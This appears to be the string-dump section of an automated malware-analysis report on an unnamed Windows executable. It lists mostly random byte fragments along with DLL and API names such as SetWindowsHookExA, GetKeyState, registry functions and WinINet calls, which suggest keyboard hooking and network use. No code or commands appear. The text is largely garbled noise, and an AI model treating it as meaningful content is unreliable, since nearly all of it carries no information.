_bed</pre><pre>1!#*5:3<</pre><pre>%xC1i<</pre><pre>.rut_y</pre><pre>}].bn</pre><pre>fK.SW</pre><pre>T^.dm</pre><pre>.tYy}</pre><pre>709@.CO</pre><pre>\^Bo?</pre><pre>$!#,(*07></pre><pre>v}.xz/</pre><pre>-4xy}</pre><pre>it.QK</pre><pre>]#%FH</pre><pre>gf`ko.jw</pre><pre>\elji.vy</pre><pre>QSWUZfl.it</pre><pre>)61732;<</pre><pre>n.VQ \fnlio)</pre><pre>}%c{H</pre><pre>u.dGLXT</pre><pre>l36>:FI.WPPRUvy</pre><pre>.CNAg</pre><pre>0.sr(</pre><pre>Zb.ls8yz</pre><pre>sT.Zf</pre><pre>gcU%S2'</pre><pre>`.y%x</pre><pre>.ks@}{z</pre><pre>ssh!:</pre><pre>FEKV.ST</pre><pre>) -.03:;0</pre><pre>%xQAT</pre><pre>p).GB</pre><pre>{UPRFi.mk</pre><pre># ,$.OH</pre><pre>MO.JN7</pre><pre>%xFMn</pre><pre>c%Xx[</pre><pre>X%upD</pre><pre>2801547</pre><pre>.DJ',</pre><pre>!( .zO</pre><pre>_t5\Q.Wc</pre><pre>%x")46</pre><pre>e"%FJ</pre><pre>!O%sn</pre><pre>#'%D-,0</pre><pre>%$0&.)/(</pre><pre>{'#%Dn</pre><pre>#&,835>;@</pre><pre>XX%5Xi0</pre><pre>b%.OU3</pre><pre>JLRU.Ze</pre><pre>".IS$v</pre><pre>`%up'</pre><pre>V\.Yg</pre><pre>B&%XP</pre><pre>ZacVo.puJr</pre><pre>j>E.IV</pre><pre>& %/ 14=</pre><pre>(".cN</pre><pre>$ ' %, 6</pre><pre>'.IOPu</pre><pre>" %(0?@.JI</pre><pre>,.(653;></pre><pre>JSX]f.geXadko</pre><pre>.qz[d</pre><pre>D,R%c</pre><pre>.GN /6</pre><pre> .OS9</pre><pre>^.af@glvrp</pre><pre>RYec.dj</pre><pre>@DM.KQq\[</pre><pre>! @6;9=8</pre><pre>%uvw~</pre><pre>', -758:</pre><pre>.) 2621`^@</pre><pre>z(.yx</pre><pre>[_bad.lj</pre><pre>DIM.WUh_x~</pre><pre>\Xbn.qsJt3</pre><pre>Q=A.DO</pre><pre>.[g`.dc1o</pre><pre>#"(41 5:89<;</pre><pre>=D.EB</pre><pre>.nx9;8</pre><pre>RVZed.giYr~-</pre><pre>. %8,-/.*</pre><pre>HJLK.RW@S\flm</pre><pre>9# y.YD</pre><pre>W.dJ;</pre><pre>%#'&-7?.9;</pre><pre>&#*.aX</pre><pre>FCJLU.PQ</pre><pre>i.(.IK</pre><pre>,`.Ka</pre><pre>!0 -) .(</pre><pre>TXgcli.ohPupz</pre><pre>]`ackop.wy</pre><pre>8.ZP.xe</pre><pre>~y%xE)</pre><pre>_ "-/751</pre><pre>;%u4DH</pre><pre>.jqt'</pre><pre>@.EOUS</pre><pre>EAF.LT</pre><pre>crp.uy</pre><pre>GJ.IN</pre><pre>TZc.di</pre><pre>(W.jR_'</pre><pre>cE&</pre><pre>a.hl9qu</pre><pre>!9=AI.SZ]</pre><pre>& /.zO(</pre><pre>.DQ(A*</pre><pre>% .GJlP}</pre><pre>|]%x`</pre><pre>il.kv</pre><pre>-c.kd</pre><pre>|FK.cq</pre><pre>N1%f!</pre><pre>$-.)0;=:</pre><pre>/, 709=;</pre><pre>.RY{zc</pre><pre>\a.eiSv&$e</pre><pre>Q]f.gc</pre><pre>3O.kG</pre><pre>i".GA</pre><pre>* /7<98`</pre><pre>.HJhV</pre><pre>d.muhqy</pre><pre>(598;?8'</pre><pre>eo.rt</pre><pre>.emhoknr</pre><pre>lO%cJ</pre><pre> /$312;@</pre><pre>%sKCP</pre><pre>%s/u?~)</pre><pre>em.qubzOf</pre><pre>.yM@bo</pre><pre>NLM.VY8akmlq</pre><pre>RPSYd.ei8s{}</pre><pre>$d$.OI@</pre><pre>'.RSo</pre><pre>!./53<>_</pre><pre>3=?D.BI</pre><pre>jF.Ic</pre><pre>R@.rl</pre><pre>'! )/.21</pre><pre>QX[d.lj(pr</pre><pre>:@FHVQSQL</pre><pre>DBEIS^c.bj3o?</pre><pre>;A.BK</pre><pre>ec.ljVnD</pre><pre>3.SO^</pre><pre>-*.OV</pre><pre>/6e%x</pre><pre>IR_.Yc</pre><pre>sv.wq</pre><pre>,-14>?=5</pre><pre>T\ef.jh</pre><pre>o$)70;.BJ</pre><pre>_.abPmrqpp_y</pre><pre>urlx{</pre><pre>|G.fa</pre><pre>.XK(v</pre><pre>as7%U=</pre><pre><F></F></pre><pre>VP^.YaXgn</pre><pre>`cjo.kh</pre><pre><",)/*7|</pre><pre>6Yp%U</pre><pre>{B.AG</pre><pre>LQ^ab.nh</pre><pre># ")7065</pre><pre> -71500.</pre><pre>R .ghIor='</pre><pre>sk.tp8wy</pre><pre>o.IGMgF<</pre><pre>h.Nf O</pre><pre>.Bx$ </pre><pre>! )0.*179</pre><pre>&,7?D.AB</pre><pre>DBusSql</pre><pre>SVZgckj.hvh</pre><pre>@.HPW</pre><pre>& #"(58:`</pre><pre>$#/:*,25</pre><pre>%Xi&_l</pre><pre>%fPNk</pre><pre>?=:GOQT.ZX</pre><pre>_%x!6</pre><pre>ýS?</pre><pre>SXcakr.wq</pre><pre>YX\.ag</pre><pre>$.OWd</pre><pre>!'#$/. )63?9;</pre><pre>.jF,1</pre><pre>$,.15<@)3</pre><pre>M.SR#_</pre><pre>\'%-.59;</pre><pre>[!.SN</pre><pre>RegOpenKeyExA</pre><pre>comdlg32.dll</pre><pre>iphlpapi.dll</pre><pre>SetViewportExtEx</pre><pre>GetViewportOrgEx</pre><pre>KERNEL32.dll</pre><pre>.ILWj}</pre><pre>SHELL32.dll</pre><pre>ScaleViewportExtEx</pre><pre>UnhookWindowsHookEx</pre><pre>GetCPInfo</pre><pre>GetKeyState</pre><pre>-N}MD</pre><pre>RegCreateKeyExA</pre><pre>.IHC6a</pre><pre>RegCloseKey</pre><pre>1, 0, 6, 6</pre><pre>(*.*)</pre><b>%original file name%.exe_208_rwx_009BC000_00002000:</b><pre>WININET.dll</pre><pre>RegDeleteKeyA</pre><pre>ADVAPI32.dll</pre><pre>InternetCrackUrlA</pre><pre>OLEAUT32.dll</pre><pre>SetWindowsHookExA</pre><pre>RegisterHotKey</pre><pre>GetViewportExtEx</pre><pre>RegOpenKeyA</pre><pre>6u!'$%f</pre><pre>RASAPI32.dll</pre><b>%original file name%.exe_208_rwx_009BF000_00001000:</b><pre>The procedure entry point %c could not be located in the dynamic link library %s</pre><pre>USER32.dll</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>GetProcessHeap</pre><pre>InternetCanonicalizeUrlA</pre><pre>OffsetViewportOrgEx</pre></pre></pre></pre></pre></pre></pre></D></pre></pre></pre></M></pre></M%f></pre></M></pre></M>